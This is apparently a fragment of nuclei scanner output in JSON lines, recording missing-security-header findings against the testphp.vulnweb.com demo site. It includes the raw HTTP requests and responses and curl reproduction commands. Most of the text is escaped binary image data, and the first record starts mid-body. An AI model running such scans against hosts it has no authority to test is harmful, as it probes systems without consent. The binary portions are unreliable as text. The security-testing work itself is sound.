\\u001c\\ufffd\\ufffd\\u0010~\\ufffd\\ufffd9#\\u0001:\\u0015F\\ufffdH\\u0003\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdA%\\ufffd\\ufffdx\\ufffd\\ufffd\\u000fw5\\ufffd\\ufffd\\ufffd\\u0003*\\ufffd\\u0003\\u0016\\ufffdIY\\ufffdHY\\u001byqE@\\ufffd\\ufffd5\\ufffd\\ufffdo\\ufffd۾\\ufffd\\ufffd\\u0012(U_dP\\ufffdV4-)$\\ufffdJ,\\ufffdl\\ufffd\\\"\\ufffd\\ufffdךˌ\\r,pƞ\\ufffds\\ufffd\\ufffd\\ufffd\\u00197B\\ufffd\\ufffd-\\ufffdC\\ufffdm\\ufffd\\ufffd\\u000f\\u0016\\r\\ufffd\\ufffdB\\ufffdf\\ufffd\\u001b\\u0014\\ufffd\\ufffd\\ufffd\\ufffd\\u001fE\\ufffdڄ\\ufffd\\ufffd\\ufffd\\ufffd18\\ufffd\\ufffd\\u001d\\ufffd\\ufffdUoU\\ufffd\\ufffd\\\"\\ufffdоؤӳ0\\u0006\\ufffdp3cT\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd5\\r$6x\\ufffd\\u0010z\\ufffd\\u0026ʶ\\ufffdTh\\u001a#\\ufffdV-\\u0002j\\u0002\\u0015\\u0005\\t\\ufffd\\ufffd\\t\\u0014M_#\\ufffd\\u001b\\u0000\\ufffd\\u0005\\u001e/+\\ufffdóJ\\ufffd\\ufffd\\ufffdF\\ufffd\\ufffd\\ufffd%\\ufffdK\\ufffd\\ufffdR\\ufffdF\\ufffd*\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd~\\ufffd\\ufffdhi\\ufffd%d\\ufffd4\\ufffdEz\\ufffd\\u0015BG\\ufffd\\u0006\\ufffd5`t\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd*\\ufffd\\u0000\\ufffdI\\ufffd\\u000eù\\ufffd9\\u003ce\\ufffd\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffdxԊfQVv\\ufffd@\\ufffd]\\ufffd\\ufffdxÂ\\ufffd\\ufffdzI\\ufffd\\ufffdc\\ufffd\\u0005u\\ufffdA#*:\\ufffdB\\u0003Q\\ufffdM\\u0003G\\ufffdDgSB\\ufffd\\ufffd\\ufffdޑ3\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\u0001\\ufffdy\\u0000\\u0001\\ufffdt錬\\n\\ufffd$\\ufffd\\ufffd]\\u0001\\u0004\\ufffdˎ\\ufffdx\\ufffd\\t\\ufffd\\ufffdY\\ufffd\\u0002\\ufffd\\ufffd:d\\u001a\\ufffdA\\u0010\\ufffdf\\ufffd\\u001c\\ufffd-\\ufffd{\\ufffd-tv݁\\ufffd\\ufffd\\ufffdV2\\ufffd.W5Y\\ufffd\\u0018\\u000bKέ\\ufffd\\ufffd,yt蓕\\ufffdU\\ufffd\\ufffdfP\\ufffd[\\u0000o\\ufffd]\\u0001aۥu'\\u0011\\u0012)\\ufffd\\ufffd+\\u0017ݹ\\u001c8*\\u0008,\\u0008\\ufffd{w\\u0007\\ufffd\\ufffd\\ufffdI\\ufffd]\\u0013Țy\\ufffd\\u0012eYD\\ufffdC!dV\\u001e\\ufffd\\t5\\ufffdA\\ufffd\\u0002\\ufffd\\ufffd\\u000eT\\ufffdB}k\\ufffd\\ufffd1\\ufffd2\\ufffdK\\u001f\\u0014\\ufffd\\ufffd.k\\\\30\\ufffd\\ufffdF.ڗ\\u0008ݭ\\ufffd}\\ufffdj\\ufffd,o\\ufffd[\\u0013\\u001b\\u001c\\ufffd\\u001a\\ufffd\\u003cQʂ\\ufffdov]\\ufffd`\\ufffdn\\ufffd\\ufffd\\u0012mH\\ufffd\\ufffd^\\ufffd古T\\ufffd|r\\ufffd\\ufffd]\\ufffd\\u0002O\\u0015\\ufffdu'\\ufffd\\u0000\\u001c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$\\ufffd\\u00166\\ufffdrgK\\ufffd\\ufffd]\\ufffd\\ufffd\\u0019\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd\\n_;\\ufffd\\u0000\\ufffd\\u0000}\\ufffd\\r\\ufffdj\\u0010\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdsn\\ufffdN\\ufffd]\\ufffd\\ufffd뷋\\ufffd\\ufffdL\\ufffdL\\ufffdE\\u0014Q\\ufffdWolq\\ufffdv\\u0002\\ufffd/h#ڶ;\\ufffd\\ufffdrT\\u001b\\ufffd\\ufffd\\ufffd\\ufffd1X\\ufffd{I{@\\ufffd\\ufffdd\\ufffd\\ufffdd\\ufffd\\u000fóG\\ufffdD\\ufffdj\\ufffd(Ν\\ufffd\\ufffd\\tm\\u001f1a@\\ufffd\\ufffdr7X\\r^E\\ufffd@\\ufffdt\\ufffd!\\ufffdU\\ufffd+\\u001bI\\ufffd\\ufffdGP\\u0019\\ufffd\\nwn\\ufffd\\ufffd\\u0010\\u000f\\u001b\\ufffdb\\u000fZ 篡\\ufffdӟO\\u003c\\ufffd\\ufffd\\ufffdbd(\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffdn\\ufffd\\ufffdo\\u001b\\ufffd\\ufffd\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd7z\\u0016#\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdfe^\\u001a\\ufffd\\ufffd\\ufffd.kYrQ\\ufffd4E\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\u001c\\u0002NԠ\\ufffd\\u0010\\ufffd\\ufffd$w\\ufffd\\ufffdO\\ufffd0$\\u0012\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd\\ufffd\\u0004\\ufffd\\ufffd.\\ufffdlR\\ufffdc\\ufffdH5\\ufffd\\ufffd\\ufffdŬ1\\ufffd\\ufffdY\\n\\ufffd\\u0006\\ufffd\\\\\\u0005\\u0003\\ufffd_\\u003c\\ufffdn\\ufffd՞2\\ufffd\\ufffd'u\\ufffd84s\\ufffdB\\u001a\\ufffd\\ufffdi\\ufffd\\ufffdJ\\u0002\\ufffd*\\ufffdGI1\\ufffda\\u0011\\ufffd6\\ufffdT\\ufffd\\ufffd\\u000b*\\ufffd\\u000bW\\ufffd\\u001f\\ufffd~\\ufffd\\ufffd\\ufffdP`\\ufffd\\ufffdP\\ufffd\\ufffdۻ1w\\ufffd\\ufffdfbI\\ufffd9\\ufffd\\u0000\\ufffd\\ufffdh\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\u0015QI\\u0026\\ufffd\\u0001G=z\\u0000\\u003c\\ufffd\\ufffd\\u0015_\\u0012\\ufffdi\\u0001/c@\\ufffd\\ufffdZS\\ufffdH\\ufffd\\ufffdb\\u0012\\ufffd\\ufffd\\u0018\\ufffdK\\ufffd`R9w,G\\u0000\\u0002\\r_S\\ufffd\\ufffd\\ufffdK\\ufffdַZ\\ufffd\\u0000\\ufffd~!9\\ufffd4\\ufffd\\ufffd5Dc܇jPF\\u001cݐ\\ufffdl}\\ufffd{4\\ufffd\\ufffd\\ufffd锉\\ufffd\\ufffd*fm\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd׻h\\u0015f\\ufffd\\ufffd\\u0019{z!\\ufffd\\ufffd\\u001d8W`_\\ufffd\\ufffd\\ufffd\\u0005\\ufffdW`C\\ufffd\\ufffdo\\ufffd=M\\ufffd\\u000cG\\u000fu`\\u0001\\ufffd\\ufffd\\ufffd\\u0010\\u0019%\\u003c\\ufffd\\ufffdfk\\ufffd\\ufffd\\ufffd\\ufffdI/\\ufffd4_\\u0001\\ufffd/\\ufffdf_\\ufffd,(\\ufffdHǫРM\\ufffd=\\u0005\\ufffd?z\\ufffdmY;\\ufffd\\ufffd\\ufffd\\ufffd\\t\\nzu\\ufffd\\ufffd篃]\\u000em|GYꬔ\\ufffdB\\ufffd%MY\\u0000՟\\u0000\\ufffd\\u0017]\\u003c\\ufffdkkUQ\\u0015\\ufffd\\ufffd\\ufffdV76\\ufffdD\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffdp\\ufffdM\\u0010!\\ufffd\\ufffd\\ufffd\\ufffdo\\ufffd\\ufffdJ\\ufffd[\\ufffd;\\u001b\\u0004_RB\\ufffd#\\u0005\\ufffd\\ufffd@\\ufffd\\ufffd \\ufffd=8$_\\ufffdp\\ufffdY\\nV\\ufffd2\\u0016\\ufffd%\\ufffd\\ufffd\\u0007\\ufffd\\ufffdyѨgӘ\\r\\u0018\\ufffd=7W\\ufffd\\ufffd\\u001f\\ufffd\\u0016\\ufffd|\\u001b=1\\ufffd\\ufffdb\\ufffd+\\ufffd\\u003c\\ufffd\\ufffd \\u003cO\\ufffdj\\ufffd\\u0003V玎\\ufffd+~\\ufffdQ\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd?\\u0010O,_\\ufffd\\ufffd'\\ufffd\\ufffdC\\u001bN\\ufffdb\\ufffd\\u003c\\ufffdn\\n\\u0018\\u0000\\ufffd\\ufffdn\\ufffd\\ufffd\\u0018\\ufffd\\u0015d_\\u0000\\ufffd\\ufffdN\\u0011\\ufffd\\ufffd;\\ufffd\\u000cȼ\\ufffd\\ufffd\\ufffd͑\\ufffd\\ufffd{4\\ufffdtq\\ufffd:HF\\ufffdI57\\\"\\ufffd\\u000c\\ufffd\\u0013a\\ufffdF\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB\\ufffd\\ufffd'$\\ufffd\\ufffd\\ufffd\\u0019cy^\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u001e6\\ufffd^E\\ufffd\\u000e_\\ufffd\\ufffd\\ufffd\\ufffdru\\ufffd\\ufffdLa\\ufffd\\ufffd\\u0019\\ufffd6\\ufffd\\r\\u0005t$\\u0017b\\ufffd\\u0016\\ufffdkn9\\ufffdU\\ufffd\\ufffd\\ufffd?\\ufffdU\\ufffdm\\ufffd\\u0015\\ufffd\\ufffdO5|\\ufffdz#\\ufffd\\ufffd;.\\ufffd\\ufffdԚ\\ufffdi*\\ufffd\\ufffd\\ufffdv\\ufffdb\\u0005\\ufffd ]mcԟq\\ufffd\\u0000\\ufffd\\u000c\\ufffdl\\ufffd\\ufffd\\t%E\\ufffd\\u0000\\u001c\\ufffd'?\\ufffd\\ufffdO\\u0007\\ufffd'\\ufffd\\ufffd)\\ufffdњ8\\ufffd\\u000b\\ufffdu\\u0006\\ufffdY\\ufffd\\ufffd\\ufffdnQ\\ufffdߥ\\ufffd9\\ufffd\\ufffd\\u0002\\r\\n\\ufffd\\ufffdW\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffdu\\ufffdqFY\\ufffd)U\\ufffdn\\ufffd\\ufffd\\u0002\\ufffd\\ufffdӽ\\u000b$\\ufffd,~f#(t\\ufffd\\ufffd87\\ufffd\\ufffd\\ufffdG\\u003e*\\ufffd}z\\ufffd\\ufffd/{\\ufffd@5S\\ufffd\\ufffdz\\u0016\\ufffd\\n\\ufffd!f\\ufffdH\\ufffd\\u0019\\u0002m\\u000c\\ufffd6\\ufffd\\ufffdn\\ufffd\\u001b`\\u0005\\ufffdNVȻ\\u0013\\ufffd9\\u0004\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd7W\\ufffd\\u0000,\\ufffd,\\ufffd\\ufffd_zG\\u000cP@\\ufffd!\\ufffd\\u0004h\\ufffd\\ufffd\\n\\u0005\\u0001}\\ufffd;\\ufffdp\\ufffd,\\ufffd\\ufffdd\\ufffd\\ufffdZ\\ufffdO\\u0003\\ufffdj\\u003c\\ufffdt\\ufffd\\u0008\\ufffd\\u0000A2\\u001a\\ufffd\\u0013|u\\ufffd+\\ufffd\\ufffd*\\ufffdS\\ufffdԐ\\u0011\\ufffd3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffd?A\\ufffdV2\\t\\ufffd,\\ufffd\\u0015\\ufffd\\ufffd*\\ufffd\\ufffd\\ufffdA\\ufffdZy\\ufffd\\ufffd\\ufffd\\ufffdd'k*\\ufffd-\\ufffdM\\ufffd\\ufffd\\ufffd\\ufffdn\\ufffd\\u0007\\ufffd\\ufffd\\u0016E\\ufffdS\\u0011C\\u000b\\ufffd%\\ufffd\\ufffd\\ufffd_\\ufffd}\\ufffd50j\\u0016#\\ufffdi\\ufffdƀ\\ufffd\\ufffd\\ufffdW\\ufffdU\\ufffd\\ufffdj\\ufffdy\\ufffd1\\u000b\\u0006\\ufffd\\ufffd\\u0013\\ufffd\\ufffd$\\ufffd\\ufffd2Q\\ufffduA\\ufffd\\ufffdP\\ufffd\\ufffdI\\ufffd2\\u0000i=\\ufffd\\u001b\\ufffd\\ufffd\\rq\\ufffdh\\ufffdP+\\ufffd\\t\\ufffd\\ufffd$\\ufffd\\ufffd\\r$\\ufffd\\ufffd\\ufffdx\\ufffd`\\ufffd\\ufffd\\u0001\\u0007\\ufffd\\u0004U\\ufffd\\ufffd\\ufffd\\ufffdp\\u0004E\\ufffdԄt8\\ufffdDl!\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\u0016\\ufffd\\ufffd\\ufffd%\\ufffdj\\u0026\\ufffd\\u001eÓҸ\\u001c\\ufffd\\u0005\\ufffd\\ufffduh\\ufffdeT\\u0008y\\ufffd\\ufffdہ\\u0016v\\ufffd\\ufffd]\\ufffd\\ufffd;\\ufffd\\ufffd\\ufffdk\\ufffd^\\ufffd\\ufffd/#6\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdl\\ufffd\\u0008\\u0015`\\u0002\\u0000\\ufffdx\\u0007\\ufffd8\\ufffd{\\u003c\\ufffd\\u0007\\u0006\\ufffd\\u0015\\ufffd\\ufffd\\ufffdZD\\ufffd\\u0002Á\\ufffdZ\\ufffdYv\\ufffd3X\\ufffdx\\ufffd]\\ufffd\\u000b9:v\\ufffd\\ufffd\\ufffd\\ufffd\\u001c\\u001fo\\ufffd\\ufffd*\\ufffdt\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdl'\\ufffd\\ufffd\\ufffd\\u0015d\\ufffd)\\ufffdXC\\ufffd\\ufffd\\ufffd\\ufffdA?\\ufffd[\\ufffd;\\u001e0̆\\ufffd\\u0006\\ufffd\\ufffd\\ufffd{$\\ufffd:\\u0011~E\\ufffd\\u001eˌE_\\ufffd:\\ufffdcd\\ufffd6\\ufffd\\ufffd\\ufffd\\ufffd@\\t x\\u001f\\ufffdZX\\ufffd0\\ufffd\\ufffd\\ufffdr\\u0008\\ufffd\\u000b\\u0026\\ufffdX5q\\ufffd\\ufffdW\\ufffd\\ufffd\\u00114!Ķ(\\u000b\\ufffdP\\ufffd\\u0015\\ufffd\\u0000!`\\ufffd\\u000cQP\\ufffd\\ufffd\\u0016]\\ufffd\\ufffd\\ufffdS@(n\\ufffd\\u0015\\u003c\\ufffd?sB\\ufffdh\\ufffd\\ufffd\\ufffd\\ufffd=\\u001e,\\ufffd\\u0026\\ufffd63\\ufffd\\ufffd׿mO\\ufffdȅ\\t \\u0000I\\ufffdC\\u001c\\ufffd\\ufffd\\u0010\\ufffdɽ\\ufffdŀ꠆\\ufffdu\\u0004\\u001a\\ufffd#\\ufffd\\ufffd|\\ufffd`j\\ufffd\\ufffdT\\ufffd\\u0014h\\ufffd1=\\ufffd\\u0004W ݃\\ufffd\\u0026󷦱\\ufffdfU\\u0014\\u000b\\ufffd\\ufffd#\\ufffdO'\\ufffd\\ufffd\\u0000F\\ufffd\\u003ey\\ufffd\\u0013\\ufffd1\\ufffd\\ufffd\\ufffd|\\ufffd\\u0026U\\u0004\\ufffd`,{\\ufffd\\n8\\u0000\\ufffdg\\ufffd$\\ufffd\\ufffd\\ufffdN\\ufffd!sjň\\u00062\\ufffd]\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\u0000Uu\\ufffds\\ufffd\\ufffd\\ufffd\\ufffds\\ufffd`t%\\ufffdT\\ufffd\\u001bzr\\ufffd\\ufffd\\ufffd\\u001bd$h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\ufffd鿱Q\\ufffd\\ufffdZ2\\ufffd\\ufffdJ\\ufffdE3\\ufffd\\u0000.\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\njd3\\u0015\\ufffdL\\ufffd\\ufffdR\\ufffdE\\ufffd\\ufffdd\\ufffd\\u001cw\\u003cp:_$N҅\\ufffdNc\\u0006\\ufffd\\ufffd\\nO\\ufffd\\ufffd\\ufffdT\\ufffd5\\u0008\\ufffdG#iF\\ufffd\\u0011?.\\ufffd\\ufffd\\ufffd\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdY\\ufffdy\\u001c\\ufffd̞h*gf\\u0014\\ufffd3-\\ufffdN\\ufffd\\ufffd#B;\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdb\\u00074t\\ufffdE\\ufffdP\\ufffdʦ3 \\ufffd\\ufffdv\\ufffd\\ufffdH\\u0004\\u000b\\ufffd\\u0016y=,\\ufffd\\ufffd\\ufffd\\u0014\\ufffd\\\"x\\ufffd\\u0002\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdJ\\ufffd\\u0005J\\ufffd\\u003c\\ufffd$\\ufffd\\u0004U^Dح\\ufffdכ\\u001dc\\ufffdc\\u001aK\\ufffd\\ufffdK_\\ufffd\\ufffd\\ufffd9^\\u0018\\ufffdW\\ufffdaZ\\ufffd]\\ufffd\\ufffdԶ’\\u0002\\ufffdT\\ufffd\\u0006(y\\ufffd\\ufffd\\u000f\\ufffd\\ufffd\\ufffd9c\\u001c\\u003c\\ufffd\\u0014\\ufffd\\ufffd\\ufffd,\\ufffdt\\ufffd\\ufffdY\\ufffd\\ufffd_o\\u0019\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd7\\ufffd\\ufffdb\\ufffdT\\ufffd\\ufffdcma\\ufffd\\ufffdq\\ufffdY\\ufffd^\\u0017\\ufffd\\ufffdN#V+\\ufffdq\\ufffd.\\ufffdC\\\"\\ufffd\\ufffd\\ufffdL\\u0008\\ufffdM\\ufffd\\ufffd:\\u0002~\\ufffdk\\ufffd|\\ufffd}\\ufffdxA\\ufffd*\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\ufffdY\\u00022\\ufffd*\\ufffd\\u0004\\n6\\ufffd\\ufffd\\u0001\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\u000e+\\ufffdI\\u001e\\ufffdT\\u0004\\u0006\\ufffd*\\ufffdt\\ufffd/8Xb\\ufffd\\ufffd\\u000c\\ufffdakr\\ufffd\\ufffdV4\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffdCvp\\ufffd\\ufffd.W\\ufffd\\u0008\\u001a\\u0000\\ufffd\\r\\ufffd\\ufffd5F\\u0016\\ufffd7F\\ufffdo[\\ufffd\\u001d\\ufffd#\\ufffd\\ufffdw}1\\ufffd\\ufffdn\\u0010MHٛ\\ufffd\\ufffd\\ufffdk\\ufffd\\ufffdL\\ufffd,\\u0000Z\\ufffd\\ufffd\\u0005\\u0014Esȫ\\u0007\\ufffd:x\\ufffdk\\ufffdU\\ufffd\\ufffdh\\ufffd~ߘ\\ufffd\\ufffd\\ufffd^*\\ufffd\\ufffd\\u0019\\ufffd\\ufffd8X\\ufffd\\ufffd\\ufffd|x4L:\\ufffdGa\\ufffd\\ufffd\\ufffd\\ufffd]Z\\ufffd\\u001b,jC9\\ufffd!\\ufffd\\u001e\\u0008\\ufffd\\ufffd\\ufffd\\ufffdŞVaL\\ufffd\\ufffd\\ufffdQg9~p\\u000c\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\u0019\\ufffd\\u001a\\ufffd\\ufffdl\\ufffdp\\ufffd\\u0018\\ufffd\\u0000Q\\ufffd\\u000c1'F\\u0018a\\ufffd$g\\u0018\\ufffd\\u0018c\\u0014\\ufffdu\\u001d\\ufffd\\ufffdo\\ufffd\\u0018bR\\ufffd\\ufffd\\ufffd\\u0018`\\ufffdF\\u0018a\\ufffd$a\\ufffd\\u0018\\ufffdFr\\ufffd\\u0018bF\\ufffda\\ufffd\\u0018(\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:25.720726333Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50' 'http://testphp.vulnweb.com/pictures/5.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19\",\"path\":\"/wvstests/pmwiki_2_1_19\",\"matched-at\":\"http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19/\",\"request\":\"GET /wvstests/pmwiki_2_1_19 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:25 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /wvstests/pmwiki_2_1_19/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /wvstests/pmwiki_2_1_19/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"scripts/\\\"\\u003escripts/\\u003c/a\\u003e 08-Apr-2013 08:44 -\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:25.887821605Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59' 'http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/6.jpg.tn\",\"path\":\"/pictures/6.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/6.jpg.tn\",\"request\":\"GET /pictures/6.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4345\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:20 GMT\\r\\nEtag: \\\"4dca64a1-10f9\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001d\\u0000\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0003\\u0005\\u0006\\u0007\\u0008\\t\\u0002\\u0001\\ufffd\\ufffd\\u0000:\\u0010\\u0000\\u0002\\u0001\\u0003\\u0003\\u0002\\u0005\\u0001\\u0006\\u0004\\u0004\\u0007\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!\\u00061\\u0007\\u0013\\\"AQa\\u00142q\\ufffd\\ufffd\\ufffd\\u0015#B\\ufffd\\u0008R\\ufffd\\ufffd\\u0016$br\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0004\\u0006\\u0005\\u0007\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0001\\u0006\\u0005\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004!1\\u0005\\u0012A\\\"\\u0006\\u0013\\u0014aq\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffdBQ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffdJR\\ufffd\\u0000\\ufffd~\\ufffd\\ufffd\\ufffd'\\ufffd\\rz5\\ufffd\\ufffd\\ufffd[\\ufffd\\ufffdPU\\ufffdpT\\u0012\\t\\ufffd$\\ufffda߷֛)\\ufffd\\u001f\\ufffd\\ufffdT\\ufffd\\ufffdĩUn 